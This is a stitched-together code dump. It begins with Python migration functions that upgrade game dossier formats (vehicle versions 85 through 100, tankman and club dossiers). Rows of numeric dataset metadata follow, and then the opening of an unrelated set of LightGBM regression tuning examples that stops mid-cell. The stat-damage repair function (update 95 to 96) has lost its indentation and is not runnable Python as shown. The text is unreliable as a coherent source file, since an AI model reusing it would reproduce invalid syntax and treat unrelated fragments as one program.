              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('impenetrable', 'H'),
                  ('maxAimerSeries', 'B'),
                  ('shootToKill', 'H'),
                  ('fighter', 'H'),
                  ('duelist', 'H'),
                  ('demolition', 'H'),
                  ('arsonist', 'H'),
                  ('bonecrusher', 'H'),
                  ('charmed', 'H'),
                  ('even', 'H')]
    addRecords(ctx, 'achievements', newRecords, {})
    setVersion(ctx, 86)
    return (86, ctx['dossierCompDescr'])
def __updateFromVehicleDossier86(compDescr):
    """Dossier update 86 -> 87: add win/base-capture counters to the
    'fortAchievements' block.

    Returns (87, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'fortAchievements',
               [('wins', 'H'),
                ('capturedBasesInAttack', 'H'),
                ('capturedBasesInDefence', 'H')], {})
    setVersion(ctx, 87)
    return (87, ctx['dossierCompDescr'])
def __updateFromVehicleDossier87(compDescr):
    """Dossier update 87 -> 88: register the 'rated7x7' and 'maxRated7x7'
    blocks.

    Returns (88, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for newBlock in ('rated7x7', 'maxRated7x7'):
        addBlock(ctx, newBlock)
    setVersion(ctx, 88)
    return (88, ctx['dossierCompDescr'])
def __updateFromVehicleDossier88(compDescr):
    """Dossier update 88 -> 89: fold Battle Hero awards earned in 7x7
    battles into the overall 'battleHeroes' counter and recompute the
    'medalKay' class accordingly.

    Returns (89, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    heroes7x7 = _countBattleHeroesBasedOn7x7Medals(ctx)
    if heroes7x7 > 0:
        packing = {'battleHeroes': (20, 'H'), 'medalKay': (38, 'B')}
        values = getStaticSizeBlockRecordValues(ctx, 'achievements', packing)
        if values:
            values['battleHeroes'] += heroes7x7
            values['medalKay'] = _medalKayClass(values['battleHeroes'])
            setStaticSizeBlockRecordValues(ctx, 'achievements', packing,
                                           values)
    setVersion(ctx, 89)
    return (89, ctx['dossierCompDescr'])
def __updateFromVehicleDossier89(compDescr):
    """Dossier update 89 -> 90: create the 'globalMapCommon' block, seeding
    it from the current 'clan'/'clan2' statistics where records overlap.

    Returns (90, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # (record name, byte offset) tables; every record is an unsigned int.
    clanOffsets = (('xp', 0), ('battlesCount', 4), ('wins', 8),
                   ('losses', 12), ('survivedBattles', 16), ('frags', 20),
                   ('shots', 24), ('directHits', 28), ('spotted', 32),
                   ('damageDealt', 36), ('damageReceived', 40),
                   ('capturePoints', 44), ('droppedCapturePoints', 48))
    clan2Offsets = (('originalXP', 0), ('damageAssistedTrack', 4),
                    ('damageAssistedRadio', 8), ('directHitsReceived', 12),
                    ('noDamageDirectHitsReceived', 16),
                    ('piercingsReceived', 20), ('explosionHitsReceived', 24),
                    ('explosionHits', 28), ('piercings', 32),
                    ('potentialDamageReceived', 36),
                    ('damageBlockedByArmor', 40))
    seedValues = {}
    seedValues.update(getStaticSizeBlockRecordValues(
        ctx, 'clan', dict((name, (off, 'I')) for name, off in clanOffsets)))
    seedValues.update(getStaticSizeBlockRecordValues(
        ctx, 'clan2', dict((name, (off, 'I')) for name, off in clan2Offsets)))
    # Record order of the new block; 'winAndSurvived' and 'frags8p' have no
    # clan counterpart and receive the block's default value.
    recordNames = ['xp', 'battlesCount', 'wins', 'losses', 'survivedBattles',
                   'frags', 'shots', 'directHits', 'spotted', 'damageDealt',
                   'damageReceived', 'capturePoints', 'droppedCapturePoints',
                   'originalXP', 'damageAssistedTrack', 'damageAssistedRadio',
                   'directHitsReceived', 'noDamageDirectHitsReceived',
                   'piercingsReceived', 'explosionHitsReceived',
                   'explosionHits', 'piercings', 'winAndSurvived', 'frags8p',
                   'potentialDamageReceived', 'damageBlockedByArmor']
    blockFormat, blockValues = getNewStaticSizeBlockValues(
        [(name, 'I') for name in recordNames], seedValues)
    addBlock(ctx, 'globalMapCommon', blockFormat, blockValues)
    setVersion(ctx, 90)
    return (90, ctx['dossierCompDescr'])
def __updateFromVehicleDossier90(compDescr):
    """Dossier update 90 -> 91: copy the legacy xp/battle counters from the
    'clan' block into new records on 'globalMapCommon'.

    Returns (91, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'globalMapCommon']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    clanPacking = {'xpBefore8_9': (52, 'I'),
                   'battlesCountBefore9_0': (60, 'I'),
                   'battlesCountBefore8_9': (56, 'I')}
    clanValues = getStaticSizeBlockRecordValues(ctx, 'clan', clanPacking)
    addRecords(ctx, 'globalMapCommon',
               [('xpBefore8_9', 'I'),
                ('battlesCountBefore8_9', 'I'),
                ('battlesCountBefore9_0', 'I')], clanValues)
    setVersion(ctx, 91)
    return (91, ctx['dossierCompDescr'])
def __updateFromVehicleDossier91(compDescr):
    """Dossier update 91 -> 92: register the 'maxGlobalMapCommon' block.

    Returns (92, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'globalMapCommon']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addBlock(ctx, 'maxGlobalMapCommon')
    setVersion(ctx, 92)
    return (92, ctx['dossierCompDescr'])
def __updateFromVehicleDossier92(compDescr):
    """Dossier update 92 -> 93: register the 'fallout' and 'maxFallout'
    blocks.

    Returns (93, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'globalMapCommon',
              'maxGlobalMapCommon']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for newBlock in ('fallout', 'maxFallout'):
        addBlock(ctx, newBlock)
    setVersion(ctx, 93)
    return (93, ctx['dossierCompDescr'])
def __updateFromVehicleDossier93(compDescr):
    """Dossier update 93 -> 94: register the 'falloutAchievements' block.

    Returns (94, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'globalMapCommon',
              'maxGlobalMapCommon', 'fallout', 'maxFallout']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addBlock(ctx, 'falloutAchievements')
    setVersion(ctx, 94)
    return (94, ctx['dossierCompDescr'])
def __updateFromVehicleDossier94(compDescr):
    """Dossier update 94 -> 95: add the stun-mechanic counters
    ('battlesOnStunningVehicles', 'stunNum', 'damageAssistedStun') to every
    per-mode statistics block.

    Returns (95, updated compact descriptor)."""
    # NOTE(review): this layout omits 'falloutAchievements' even though
    # update 93 -> 94 added that block - confirm against getHeader().
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'globalMapCommon',
              'maxGlobalMapCommon', 'fallout', 'maxFallout']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # Identical record set for each mode; hoisted out of the loop.
    stunRecords = [('battlesOnStunningVehicles', 'I'),
                   ('stunNum', 'I'),
                   ('damageAssistedStun', 'I')]
    for mode in ('a15x15_2', 'clan2', 'company2', 'a7x7', 'historical',
                 'fortBattles', 'fortSorties', 'rated7x7', 'globalMapCommon',
                 'fallout'):
        addRecords(ctx, mode, stunRecords, {})
    setVersion(ctx, 95)
    return (95, ctx['dossierCompDescr'])
def __updateFromVehicleDossier95(compDescr):
# Dossier update 95 -> 96: repairs corrupted 'damageAssistedStun' values.
# The masks below (65535 / 4294901760L = 0xFFFF0000) suggest the high 16
# bits of the 4-byte stun field actually belong to the preceding record
# of each block. NOTE: indentation was lost in this copy; the nesting of
# the branches must be restored from the original source before running.
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon',
'maxGlobalMapCommon',
'fallout',
'maxFallout',
'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
# Byte offset of 'battlesOnStunningVehicles' within each affected block.
battlesOnStunningVehiclesOffsets = {'fortBattles': 104,'globalMapCommon': 116,'a15x15_2': 44,
'fortSorties': 104,'historical': 104,
'rated7x7': 104,'clan2': 44,
'fallout': 128,'company2': 44,
'a7x7': 108}
for block, offset in battlesOnStunningVehiclesOffsets.iteritems():
# Name of the record stored directly before the stun trio; it differs
# per block (default 'damageBlockedByArmor').
lastFieldKey = {'a7x7': 'battlesCountBefore9_0',
'globalMapCommon': 'battlesCountBefore9_0',
'fallout': 'deathCount'
}.get(block, 'damageBlockedByArmor')
packing = {lastFieldKey: (offset - 4, 'I'),'battlesOnStunningVehicles': (
offset, 'I'),
'stunNum': (
offset + 4, 'I'),
'damageAssistedStun': (
offset + 8, 'I')
}
values = getStaticSizeBlockRecordValues(updateCtx, block, packing)
# Skip blocks that are absent from this dossier.
if not values:
continue
lastField = values[lastFieldKey]
stunNum = values['stunNum']
damageAssistedStun = values['damageAssistedStun']
# Values that fit in 16 bits are considered uncorrupted.
if damageAssistedStun <= 65535:
continue
elif 0 == stunNum:
# No stuns recorded, so the whole high word belongs to the previous
# record: move it there and keep only the low 16 bits of stun damage.
setStaticSizeBlockRecordValues(updateCtx, block, {lastFieldKey: (offset - 4, 'I'),'damageAssistedStun': (
offset + 8, 'I')
}, {lastFieldKey: lastField + (damageAssistedStun & 4294901760L),'damageAssistedStun': damageAssistedStun & 65535
})
elif 0 != stunNum and damageAssistedStun > 65535:
# Ambiguous case; only attempted for the random-battle block.
if 'a15x15_2' != block:
continue
else:
piercingPacking = {'noDamageDirectHitsReceived': (16, 'I'),'directHitsReceived': (12, 'I'),'potentialDamageReceived': (36, 'I'),
'piercingsReceived': (20, 'I')}
damageReceivedPacking = {'damageReceived': (40, 'I')}
data = getStaticSizeBlockRecordValues(updateCtx, 'a15x15_2', piercingPacking)
data.update(getStaticSizeBlockRecordValues(updateCtx, 'a15x15', damageReceivedPacking))
# Require enough hit statistics for the heuristic to be meaningful.
if data['piercingsReceived'] < 50 or data['directHitsReceived'] < 50:
continue
else:
potentialDamagePerHit = 1.0 * data['potentialDamageReceived'] / data['directHitsReceived']
# Estimate of total blocked damage from the aggregate counters.
aproxDamageBlockedByArmor = data['potentialDamageReceived'] - data['damageReceived']
if data['noDamageDirectHitsReceived'] < 50 or aproxDamageBlockedByArmor <= 65535:
continue
potentialDamagePerHitForBlockedDamage = 1.0 * lastField / data['noDamageDirectHitsReceived']
# Shift 64KiB chunks from stun damage to blocked damage while the
# estimate says blocked damage is still under-counted.
while aproxDamageBlockedByArmor >= lastField + (damageAssistedStun & 4294901760L) and potentialDamagePerHit > potentialDamagePerHitForBlockedDamage:
lastField += 65536
damageAssistedStun -= 65536
potentialDamagePerHitForBlockedDamage = 1.0 * lastField / data['noDamageDirectHitsReceived']
# Only write back if the correction did not underflow.
if damageAssistedStun >= 0:
setStaticSizeBlockRecordValues(updateCtx, block, {lastFieldKey: (offset - 4, 'I'),'damageAssistedStun': (
offset + 8, 'I')
}, {lastFieldKey: lastField,'damageAssistedStun': damageAssistedStun
})
setVersion(updateCtx, 96)
return (
96, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier96(compDescr):
    """Dossier update 96 -> 97: register the ranked-battle blocks
    ('ranked', 'maxRanked', 'rankedSeasons').

    Returns (97, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'globalMapCommon',
              'maxGlobalMapCommon', 'fallout', 'maxFallout',
              'falloutAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for newBlock in ('ranked', 'maxRanked', 'rankedSeasons'):
        addBlock(ctx, newBlock)
    setVersion(ctx, 97)
    return (97, ctx['dossierCompDescr'])
def __updateFromVehicleDossier97(compDescr):
    """Migrate a vehicle dossier from layout version 97 to 98.

    Version 98 drops the 'wins', 'capturedBasesInAttack' and
    'capturedBasesInDefence' records from the 'fortAchievements' block.
    """
    layout = [
     'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements',
     'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions', 'emblems', 'camouflages',
     'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'uniqueAchievements',
     'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements',
     'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon',
     'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements', 'ranked',
     'maxRanked', 'rankedSeasons']
    ctx = {
     'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': layout}
    getHeader(ctx)
    # Offsets/formats of the records being removed, as stored in v97.
    obsoleteRecords = {
     'wins': (8, 'H'),
     'capturedBasesInAttack': (10, 'H'),
     'capturedBasesInDefence': (12, 'H')}
    removeRecords(ctx, 'fortAchievements', obsoleteRecords)
    setVersion(ctx, 98)
    return (98, ctx['dossierCompDescr'])
def __updateFromVehicleDossier98(compDescr):
    """Migrate a vehicle dossier from layout version 98 to 99.

    Version 99 appends the empty 'a30x30' and 'max30x30' blocks.
    """
    layout = [
     'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements',
     'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions', 'emblems', 'camouflages',
     'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'uniqueAchievements',
     'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements',
     'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon',
     'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements',
     'ranked', 'maxRanked', 'rankedSeasons']
    ctx = {
     'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': layout}
    getHeader(ctx)
    for newBlockName in ('a30x30', 'max30x30'):
        addBlock(ctx, newBlockName)
    setVersion(ctx, 99)
    return (99, ctx['dossierCompDescr'])
def __updateFromVehicleDossier99(compDescr):
    """Migrate a vehicle dossier from layout version 99 to 100.

    Version 100 appends the empty 'epicBattle', 'maxEpicBattle' and
    'epicBattleAchievements' blocks.
    """
    # NOTE(review): unlike the v96-v98 layouts, this one omits
    # 'falloutAchievements'; preserved as-is — confirm against the v99 format.
    layout = [
     'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements',
     'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions', 'emblems', 'camouflages',
     'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'uniqueAchievements',
     'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements',
     'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon',
     'maxGlobalMapCommon', 'fallout', 'maxFallout', 'ranked', 'maxRanked', 'rankedSeasons',
     'a30x30', 'max30x30']
    ctx = {
     'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': layout}
    getHeader(ctx)
    for newBlockName in ('epicBattle', 'maxEpicBattle', 'epicBattleAchievements'):
        addBlock(ctx, newBlockName)
    setVersion(ctx, 100)
    return (100, ctx['dossierCompDescr'])
def __bootstrapTankmanDossierFrom(ver, compDescr):
    """Upgrade a legacy tankman dossier (version <= 14) straight to
    TANKMAN_DOSSIER_VERSION via the custom dossier1 updater.

    Dossiers already past version 14 are returned unchanged.
    """
    if ver > 14:
        # Modern format — nothing to bootstrap.
        return (ver, compDescr)
    upgraded = dossiers2.custom.tankmen_dossier1_updater.updateDossierCompDescr(compDescr)
    return (TANKMAN_DOSSIER_VERSION, upgraded)
def __addTankmanDossierUpdaters(module, seq):
    # Install a bootstrap updater '__updateFromTankmanDossier<v>' on `module`
    # for every version in `seq` that lacks a hand-written one, so the generic
    # version-update loop can step through legacy versions uniformly.
    for v in seq:
        updaterName = '__updateFromTankmanDossier%d' % (v,)
        if getattr(module, updaterName, None) is None:
            setattr(module, updaterName, partial(__bootstrapTankmanDossierFrom, v))
            # Give the partial a real __name__ for introspection/logging.
            getattr(module, updaterName).__name__ = updaterName
    return
# Auto-generate bootstrap updaters for legacy tankman dossier versions 10..63;
# hand-written updaters (64, 65, ...) below take precedence.
__addTankmanDossierUpdaters(sys.modules[__name__], xrange(10, 64))
def __updateFromTankmanDossier64(compDescr):
    """Migrate a tankman dossier from version 64 to 65 by adding the
    'huntsman' achievement record (unsigned short, zero-initialized)."""
    ctx = {
     'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': ['total', 'achievements']}
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('huntsman', 'H')], {})
    setVersion(ctx, 65)
    return (65, ctx['dossierCompDescr'])
def __updateFromTankmanDossier65(compDescr):
    """Migrate a tankman dossier from version 65 to 66 by adding the
    'sniper2' and 'mainGun' achievement records."""
    ctx = {
     'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': ['total', 'achievements']}
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('sniper2', 'H'), ('mainGun', 'H')], {})
    setVersion(ctx, 66)
    return (66, ctx['dossierCompDescr'])
def __updateFromClubDossier1(compDescr):
    """Migrate a club dossier from version 1 to 2 by appending the empty
    'singleAchievementsRated7x7' block."""
    ctx = {
     'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': ['total', 'clubBattles', 'vehicles', 'maps', 'achievementsRated7x7']}
    getHeader(ctx)
    addBlock(ctx, 'singleAchievementsRated7x7')
    setVersion(ctx, 2)
    return (2, ctx['dossierCompDescr'])
class DossierVersionUpdaterBase(VersionUpdaterBase):
    """Base for the per-dossier-type version updaters: binds a log label to
    the generic version-update machinery of VersionUpdaterBase."""

    def __init__(self, logID, functionTemplate, latestVersion):
        # logID is a human-readable label passed to the base updater
        # (presumably used only in log messages — defined outside this view).
        super(DossierVersionUpdaterBase, self).__init__(functionTemplate, latestVersion)
        self.__logID = logID

    def updateVersion(self, currentVersion, compDescr):
        # Run the chained per-version updaters; return only the resulting
        # version number (the updated compDescr is discarded here).
        return self._updateToLatestVersion(currentVersion, self.__logID, compDescr)[0]
@singleton
class AccountDossierVersionUpdater(DossierVersionUpdaterBase):
    """Singleton updater for account dossiers."""

    def __init__(self):
        # Name the class explicitly in super(): super(self.__class__, ...)
        # recurses infinitely if the class is ever subclassed.
        super(AccountDossierVersionUpdater, self).__init__('Account dossier', ACCOUNT_DOSSIER_UPDATE_FUNCTION_TEMPLATE, ACCOUNT_DOSSIER_VERSION)
@singleton
class VehicleDossierVersionUpdater(DossierVersionUpdaterBase):
    """Singleton updater for vehicle dossiers."""

    def __init__(self):
        # Explicit class in super() — super(self.__class__, ...) breaks
        # under subclassing (infinite recursion).
        super(VehicleDossierVersionUpdater, self).__init__('Vehicle dossier', VEHICLE_DOSSIER_UPDATE_FUNCTION_TEMPLATE, VEHICLE_DOSSIER_VERSION)
@singleton
class TankmanDossierVersionUpdater(DossierVersionUpdaterBase):
    """Singleton updater for tankman dossiers."""

    def __init__(self):
        # Explicit class in super() — super(self.__class__, ...) breaks
        # under subclassing (infinite recursion).
        super(TankmanDossierVersionUpdater, self).__init__('Tankman dossier', TANKMAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE, TANKMAN_DOSSIER_VERSION)
@singleton
class ClanDossierVersionUpdater(DossierVersionUpdaterBase):
    """Singleton updater for clan dossiers."""

    def __init__(self):
        # Explicit class in super() — super(self.__class__, ...) breaks
        # under subclassing (infinite recursion).
        super(ClanDossierVersionUpdater, self).__init__('Clan dossier', CLAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE, CLAN_DOSSIER_VERSION)
@singleton
class Rated7x7DossierVersionUpdater(DossierVersionUpdaterBase):
    """Singleton updater for rated 7x7 dossiers."""

    def __init__(self):
        # Explicit class in super() — super(self.__class__, ...) breaks
        # under subclassing (infinite recursion).
        super(Rated7x7DossierVersionUpdater, self).__init__('Rated7x7 dossier', RATED7X7_DOSSIER_UPDATE_FUNCTION_TEMPLATE, RATED7X7_DOSSIER_VERSION)
@singleton
class ClubDossierVersionUpdater(DossierVersionUpdaterBase):
    """Singleton updater for club dossiers."""

    def __init__(self):
        # Explicit class in super() — super(self.__class__, ...) breaks
        # under subclassing (infinite recursion).
        super(ClubDossierVersionUpdater, self).__init__('Club dossier', CLUB_DOSSIER_UPDATE_FUNCTION_TEMPLATE, CLUB_DOSSIER_VERSION)
| 34.889875
| 168
| 0.644557
| 7,618
| 114,055
| 9.578498
| 0.08388
| 0.058244
| 0.040072
| 0.057751
| 0.828722
| 0.817731
| 0.812181
| 0.80563
| 0.757075
| 0.74792
| 0
| 0.043405
| 0.204936
| 114,055
| 3,269
| 169
| 34.889875
| 0.761273
| 0.001824
| 0
| 0.815143
| 0
| 0
| 0.401913
| 0.03207
| 0.000656
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003605
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81128a64f85910cdc5335d7c0eebc31714ff2804
| 11,457
|
py
|
Python
|
examples/regression_original/example_lgbm_regression.py
|
c60evaporator/tune-easy
|
a4053f5a09f3483414cb36b9fc3d7dc6753887f4
|
[
"BSD-3-Clause"
] | null | null | null |
examples/regression_original/example_lgbm_regression.py
|
c60evaporator/tune-easy
|
a4053f5a09f3483414cb36b9fc3d7dc6753887f4
|
[
"BSD-3-Clause"
] | null | null | null |
examples/regression_original/example_lgbm_regression.py
|
c60evaporator/tune-easy
|
a4053f5a09f3483414cb36b9fc3d7dc6753887f4
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T05:13:07.000Z
|
2022-01-06T05:13:07.000Z
|
# %% LGBMRegressor, GridSearch, no argument
# Minimal example: tune LGBMRegressor via grid search with library defaults,
# then render every diagnostic plot the tuner offers.
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.plot_first_validation_curve()
tuning.grid_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, RandomSearch, no argument
# Same pipeline as the grid-search cell, using random search instead.
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.random_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, BayesianOptimization, no argument
# Same pipeline, using Bayesian optimization for the search.
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
